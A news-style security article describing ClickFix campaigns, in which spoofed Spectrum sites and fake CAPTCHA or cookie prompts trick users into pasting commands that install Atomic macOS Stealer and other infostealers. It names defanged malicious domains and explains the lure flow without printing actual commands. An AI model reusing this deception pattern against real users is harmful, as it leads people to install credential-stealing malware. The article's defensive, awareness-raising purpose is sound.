Cybersecurity experts are warning about a new malware campaign that uses a deceptive tactic called ClickFix to trick Mac users into downloading malicious software known as Atomic macOS Stealer (AMOS).
What makes this campaign particularly dangerous is the use of fake websites that closely mimic well-known companies, such as the American telecommunications provider Spectrum. These spoofed sites look nearly identical to the real ones but are designed to deceive and deliver malware.
Once a victim lands on one of these sites and downloads what appears to be a legitimate app, they receive a malicious script. This script is specifically designed to steal system passwords, bypass Mac security defenses, and download a version of AMOS that subsequently harvests even more private information.
According to the analysis, the script uses macOS-native commands to perform these tasks without raising suspicion. There are signs that the perpetrators may be Russian-speaking cybercriminals, as the malware code includes comments written in Russian.
How the Scam Works: Fake Verification That Installs Malware
It all starts with a website that pretends to be from the internet provider Spectrum. The domain names are nearly identical to the real ones, like panel-spectrum[.]net or spectrum-ticket[.]neto, and it’s easy to fall for them if you’re not paying close attention.
Upon visiting one of these fake sites, users are prompted to complete an hCaptcha verification, allegedly to check the security of their connection. Nothing out of the ordinary—at first glance.
But here’s the trick: after clicking the familiar “I’m not a robot” checkbox, an error message appears saying something like “CAPTCHA verification failed,” suggesting you click a button for an “alternative verification.”
Clicking that button actually copies a malicious command to your clipboard, and the site then provides specific instructions based on your operating system. For example, Windows users are told to open the Run dialog with Windows + R and paste the command. Mac users are guided to open Terminal and run a shell script.
That script is the real trap: it requests your system password (disguised as a normal process), and in the background, it downloads malware called Atomic Stealer, which is designed to steal personal information such as passwords, private files, and even access to your cryptocurrency wallets.
Interestingly, the site contains several technical flaws and contradictions. For instance, Linux users were shown a PowerShell command (which doesn’t work on Linux), and Mac or Windows users received instructions like “press and hold Windows + R,” which only makes sense on a PC.
These inconsistencies make it clear that the site was hastily put together, likely by attackers aiming to inflict quick damage before their scam was discovered.
All this is happening amid a growing wave of campaigns using the ClickFix tactic—a deceptive method that has become popular for distributing various types of malware. According to experts, those behind these attacks often use the same playbook: highly targeted fake emails (spear phishing), compromised websites that look legitimate, and even reputable platforms like GitHub to distribute their malicious files.
From Fake CAPTCHAs to Malware
The links shared through these methods typically direct users to a fake webpage featuring a CAPTCHA, which appears completely harmless. Everything seems like you're simply verifying that you're human or resolving a minor technical issue. But in reality, the page is crafted to convince you to execute dangerous commands on your system (all in the name of “fixing” a problem that doesn’t actually exist).
And just like that, without knowing it, many users end up playing an active role in their own hacking. It’s a highly effective social engineering trick because it bypasses security controls without exploiting technical vulnerabilities—the user themselves becomes the entry point.
This type of attack, known as ClickFix, has already been detected in multiple parts of the world, including Europe, the Middle East, Africa, and the United States. Although the campaigns vary in form, they all share the same goal: to install malware, whether it be trojans, information stealers, or even ransomware.
In fact, a recent phishing campaign was discovered using fake Booking.com emails, specifically targeting hotels and food businesses. These emails also featured a fake CAPTCHA which, once completed, triggered the download of malware such as XWorm RAT, PureLogs Stealer, or DanaBot. The lure is simple and adaptable—this is why ClickFix is seeing widespread use lately.
And it doesn’t stop there: there have also been versions of this attack that mimic cookie consent banners. Yes, those standard pop-ups that ask you to accept a site’s cookies. In this variation, clicking “Accept” downloads a malicious script, and the site even instructs you to execute it as part of the process to “accept the cookies.”
In summary, what seems like a simple routine action—like clicking “Accept” or verifying a CAPTCHA—can become the gateway for compromising your system.
Read more: Do you know how to spot a phishing attack?
ClickFix: The Trick That Turns Routine Into a Real Threat
In a case that occurred in April 2025, researchers at Darktrace discovered that a group of attackers—still largely unidentified—was using ClickFix as an entry point to infiltrate foreign systems. Their objective: to gradually gain a foothold within the network, move laterally across connected devices, and exfiltrate system data to an external server using simple web requests—all without triggering any alarms.
ClickFix, as experts explain, is essentially a well-disguised trap. It exploits human error to bypass technical defenses. How? By tricking users into performing actions that seem completely normal but actually allow attackers to walk right through the front door.
It’s not just about a fake CAPTCHA—attackers have also created counterfeit versions of well-known services like Google reCAPTCHA and Cloudflare Turnstile. And they do it so convincingly that, at a glance, they look 100% legitimate. Sometimes, they even inject these fake CAPTCHAs into legitimate websites that have been compromised, making them even harder for the average user to detect.
Through these tactics, attackers manage to deliver highly dangerous malware. This includes information stealers like Lumma and StealC, which harvest credentials and sensitive data, and remote access trojans (RATs) like NetSupport RAT, which allow attackers to control your system remotely.
And the worst part: this works because we’ve become so accustomed to seeing CAPTCHAs and security checks everywhere. As Daniel Kelley from SlashNext points out, many users develop a kind of “verification fatigue”—they click automatically just to keep browsing, without thinking twice about what they’re agreeing to. Attackers know this, and they exploit it to their advantage.